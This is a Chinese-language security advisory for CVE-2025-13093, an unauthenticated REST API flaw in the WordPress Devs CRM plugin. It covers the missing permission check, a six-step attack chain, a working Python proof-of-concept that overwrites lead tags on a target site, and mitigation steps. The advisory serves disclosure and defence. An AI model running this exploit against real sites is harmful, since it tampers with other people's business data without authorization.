CVE-2025-13093 CVSS 5.3 中危

CVE-2025-13093 WordPress Devs CRM插件未授权API访问漏洞

披露日期: 2025-12-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13093

漏洞类型

缺少功能级访问控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Devs CRM – Manage tasks, attendance and teams all together

漏洞概述

CVE-2025-13093是WordPress插件Devs CRM中的一个高危安全漏洞。该插件用于管理任务、考勤和团队协作，在1.1.8及之前所有版本中存在严重的访问控制缺陷。漏洞源于REST-API端点'/wp-json/devs-crm/v1/bulk-update'缺少权限验证机制，允许未认证的任意攻击者通过发送特制请求修改线索标签（leads tags）数据。CVSS评分5.3属于中等严重程度，虽然对机密性和完整性影响较低，但由于攻击复杂度低且无需认证，攻击门槛极低。该漏洞由WordFence安全团队于2025年12月13日披露，攻击者可利用此漏洞批量修改CRM系统中的客户线索标签，可能导致业务数据混乱或被恶意篡改，影响企业客户关系管理数据的完整性和可用性。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control（访问控制失效）类别。在Devs CRM插件的REST-API路由注册中，bulk-update端点未调用current_user_can()或权限检查函数来验证请求者身份。当WordPress REST API接收到对'/wp-json/devs-crm/v1/bulk-update'的POST请求时，直接处理请求参数而跳过身份认证流程。攻击者可通过构造JSON请求体，指定要更新的线索ID和新标签值，利用WordPress内置的REST API处理机制直接操作数据库。漏洞利用无需任何有效凭证，攻击者只需知道目标站点URL即可发起攻击。插件开发者应在REST-API回调函数中添加权限检查逻辑，如检查current_user_can('manage_options')，确保只有授权用户才能执行批量更新操作。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress站点并确认安装Devs CRM插件（版本≤1.1.8）

STEP 2

步骤2

攻击者构造针对/wp-json/devs-crm/v1/bulk-update端点的POST请求

STEP 3

步骤3

请求中包含lead_ids数组和tags数组，无需任何认证头或cookie

STEP 4

步骤4

插件REST-API处理器接收请求，因缺少current_user_can()检查而直接处理

STEP 5

步骤5

数据库中指定线索记录的标签被批量更新为攻击者指定的值

STEP 6

步骤6

攻击者可通过重复请求实现对CRM系统数据的持续破坏或数据篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

target = 'http://vulnerable-wordpress-site.com'

# CVE-2025-13093 PoC - Unauthorized bulk-update via REST API
endpoint = '/wp-json/devs-crm/v1/bulk-update'
url = target + endpoint

payload = {
    'lead_ids': [1, 2, 3, 4, 5],
    'tags': ['malicious_tag', 'spam', 'unwanted']
}

headers = {
    'Content-Type': 'application/json',
    'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-13093-PoC)'
}

try:
    response = requests.post(url, json=payload, headers=headers, timeout=10)
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')
    
    if response.status_code == 200:
        print('[+] SUCCESS: Lead tags updated without authentication')
    else:
        print('[-] Failed or plugin not vulnerable')
except requests.exceptions.RequestException as e:
    print(f'[-] Request failed: {e}')

影响范围

Devs CRM plugin <= 1.1.8

防御指南

临时缓解措施

在官方补丁发布前，可通过以下方式临时缓解：1) 临时禁用Devs CRM插件；2) 使用.htaccess或Nginx配置限制对/wp-json/devs-crm/路径的访问，仅允许特定IP或需要认证的请求；3) 部署Web应用防火墙规则检测和阻止异常的bulk-update请求；4) 监控WordPress日志中对REST API端点的异常访问模式。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表